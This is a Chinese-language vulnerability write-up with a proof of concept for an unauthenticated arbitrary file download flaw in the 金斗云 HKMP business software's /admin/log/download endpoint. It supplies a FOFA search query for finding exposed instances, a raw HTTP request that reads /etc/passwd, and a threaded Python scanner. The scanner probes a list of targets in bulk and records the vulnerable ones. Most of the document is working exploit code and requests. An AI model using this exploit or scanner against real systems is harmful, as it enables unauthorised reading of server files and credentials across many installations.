漏洞描述:
金斗云智慧商业软件是一款功能强大、易于使用的智慧管理系统,通过智能化的管理工具,帮助企业实现高效经营、优化流程、降低成本,并提升客户体验。无论是珠宝门店、4S店还是其他零售、服务行业,金斗云都能提供量身定制的解决方案,助力企业实现数字化转型和智能化升级。帮助企业提升业绩、优化流程、降低成本,并增强客户体验。金斗云 HKMP 智慧商业软件的 /admin/log/download 接口无需登录即可访问,且对 file 参数的取值缺少限制,存在任意文件下载(任意文件读取)漏洞:未经身份验证的远程攻击者可通过控制 file 参数读取服务器上应用进程有权限访问的任意文件(下文 PoC 以读取 /etc/passwd 为例,Windows 目标需换用其他探测文件)。
fofa
body="金斗云 Copyright"
poc
GET /admin/log/download?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
复现成功
脚本
import re
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse

import requests
import urllib3
# Every probe is sent with verify=False, so silence the InsecureRequestWarning
# urllib3 would otherwise emit once per request.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
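def POC_1(target_url, *, timeout=15):
    """Probe one host for the unauthenticated /admin/log/download file read.

    Sends ``GET /admin/log/download?file=/etc/passwd`` (the same request as
    the PoC above) and treats the target as vulnerable only when the reply
    is HTTP 200 and the body contains a passwd-style ``root:<pw>:0:0:``
    entry. The original check (``"root" in response.text``) also fired on
    login pages, error pages and any HTML that merely mentioned the word.

    Vulnerable targets are printed in green and appended to
    ``存在漏洞的url.txt``; non-vulnerable and unreachable targets are printed
    in red. Colour codes are reset at the end of each line so the terminal
    does not stay green/red for subsequent output.

    Only run this against systems you are authorised to test.

    Args:
        target_url: Base URL of the target, e.g. ``http://host:port``. A bare
            ``host[:port]`` (as commonly found in target.txt) is accepted and
            assumed to be plain HTTP; a trailing slash is tolerated.
        timeout: Per-request timeout in seconds.

    Returns:
        True if the target looks vulnerable, False otherwise (including when
        the request fails), so callers can aggregate results without parsing
        console output.
    """
    # requests refuses URLs without a scheme ("No connection adapters"), and
    # urlparse() would yield an empty netloc for them.
    if not target_url.startswith(("http://", "https://")):
        target_url = "http://" + target_url
    base_url = target_url.rstrip("/")
    host = urlparse(base_url).netloc
    vuln_url = base_url + "/admin/log/download?file=/etc/passwd"
    # Same header set as the documented PoC; a Content-Type on a GET with no
    # body carries no information, so it is not sent.
    headers = {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
        "Accept-Encoding": "gzip",
        "Connection": "close",
    }
    try:
        # verify=False on purpose: scan targets routinely use self-signed or
        # expired certificates; we are not relying on TLS for anything here.
        response = requests.get(url=vuln_url, headers=headers, timeout=timeout, verify=False)
    except requests.exceptions.RequestException as exc:
        # Only network/HTTP-level failures are "target unreachable"; anything
        # else (e.g. a bug in this script) should surface, not be swallowed.
        print(f"\033[31m[x] 请求失败 {target_url}: {exc}\033[0m")
        return False

    # /etc/passwd always has a line like "root:x:0:0:root:/root:/bin/bash";
    # requiring the uid/gid 0 fields avoids false positives from pages that
    # simply contain the word "root".
    vulnerable = (
        response.status_code == 200
        and re.search(r"\broot:[^:\n]*:0:0:", response.text) is not None
    )
    if not vulnerable:
        print(f"\033[31m[x] 目标 {target_url} 不存在漏洞\033[0m")
        return False

    print(f"\033[32m[o] 目标 {target_url} 存在漏洞\033[0m")
    # Called from several threads: each result is one short write in its own
    # open/close, so at worst lines interleave, never corrupt each other.
    with open("存在漏洞的url.txt", "a", encoding="UTF-8") as f:
        f.write(target_url + "\n")
    return True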
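def main(max_workers=32):
    """Read targets from ./target.txt and probe each one with POC_1.

    One target per line; blank lines and lines starting with ``#`` are
    skipped (the original passed empty strings straight to POC_1). Probing
    runs in a bounded thread pool rather than one thread per target, so a
    large list no longer opens thousands of connections at once.

    Args:
        max_workers: Number of concurrent probes. The work is I/O-bound, so
            threads overlap the per-request timeouts well.
    """
    with open("./target.txt", "r", encoding="UTF-8") as f:
        targets = [line.strip() for line in f]
    targets = [t for t in targets if t and not t.startswith("#")]

    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # Draining the iterator makes any exception raised inside POC_1
        # propagate here instead of being lost with the future.
        list(pool.map(POC_1, targets))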
# Script entry point: probe every target listed in ./target.txt.
if __name__ == "__main__":
    main()